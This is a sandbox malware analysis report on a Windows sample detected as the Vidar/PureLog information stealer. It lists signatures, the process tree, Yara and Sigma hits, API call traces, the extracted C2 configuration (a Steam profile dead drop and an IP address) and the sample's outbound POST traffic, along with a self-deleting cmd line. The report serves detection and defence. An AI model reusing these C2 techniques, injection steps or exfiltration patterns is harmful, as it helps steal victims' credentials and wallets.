Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.198.6512.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
Analysis ID:1447066
MD5:3d5d6485af7cd75f9cb1284a35e70f97
SHA1:511388b6ef0247a952580e1aaa70e6e7646e35fb
SHA256:d9598915932030d8c05825ef9d1d331cbea8cb887aa6570f96d3cec23c311411
Tags:exeStealc
Infos:

Detection

PureLog Stealer, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Opens network shares
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.198.6512.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe" MD5: 3D5D6485AF7CD75F9CB1284A35E70F97)
    • MSBuild.exe (PID: 6712 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • cmd.exe (PID: 6580 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • WerFault.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • timeout.exe (PID: 3804 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "a2e3340f7f64008401fa5787a882af45", "Version": "9.8"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Win32.Malware-gen.198.6512.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
          • 0x221f0:$s1: JohnDoe
          • 0x31f80:$s1: JohnDoe
          • 0x221e8:$s2: HAL9TH
          00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x20df0:$s1: JohnDoe
                • 0x20de8:$s2: HAL9TH
                0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                  • 0x201f0:$s1: JohnDoe
                  • 0x201e8:$s2: HAL9TH
                  0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    Click to see the 8 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Silenttrinity Stager Msbuild Activity
                    Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 23.199.218.33, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "a2e3340f7f64008401fa5787a882af45", "Version": "9.8"}
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeReversingLabs: Detection: 34%
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeVirustotal: Detection: 38%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DD20 CryptReleaseContext,0_2_6D05DD20
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DE00 CryptGenRandom,__CxxThrowException@8,0_2_6D05DE00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DEE0 CryptReleaseContext,0_2_6D05DEE0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05D9D0 CryptAcquireContextA,GetLastError,0_2_6D05D9D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,0_2_6D05DBB0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0835E0 CryptReleaseContext,0_2_6D0835E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05D7D4 CryptReleaseContext,0_2_6D05D7D4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D05D7F0 CryptReleaseContext,0_2_6D05D7F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,1_2_004062A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406242
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,1_2_004082DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_0040245C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00410DAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6CC8A9A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC844C0 PK11_PubEncrypt,1_2_6CC844C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC84440 PK11_PrivDecrypt,1_2_6CC84440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC54420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6CC54420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCD25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,1_2_6CCD25B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC6E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,1_2_6CC6E6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,1_2_6CC8A650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC68670 PK11_ExportEncryptedPrivKeyInfo,1_2_6CC68670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCAA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,1_2_6CCAA730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCB0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,1_2_6CCB0180
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004440000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.0000000005610000.00000004.08000000.00040000.00000000.sdmp, Protect544cd51a.dll.0.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdbfffGCTL source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: System.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.pdbD source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: C:\projects\polly\src\Polly.Net45\obj\Release\net45\Polly.pdbjz source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA256 source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x86.Release\corehost\cli\apphost\standalone\Release\apphost.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                    Source: Binary string: mscorlib.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb< source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2058676901.000000006CD5F000.00000002.00000001.01000000.0000000B.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2054205361.00000000192D8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1764198655.0000000004372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, 00000000.00000002.1767557867.00000000056CA000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER74E4.tmp.dmp.4.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER74E4.tmp.dmp.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00401162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004162AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00409900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040A981
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_054333D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then jmp 0543BA0Ah0_2_0543B575
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_054335F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_054335F8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05432408
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_054334E0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_054334E8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05433700
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_05433708
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_0543BE18
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_0543BE20
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then jmp 0543BA0Ah0_2_0543B958
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h0_2_054333D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_054323FC

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 78.47.123.174 78.47.123.174
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
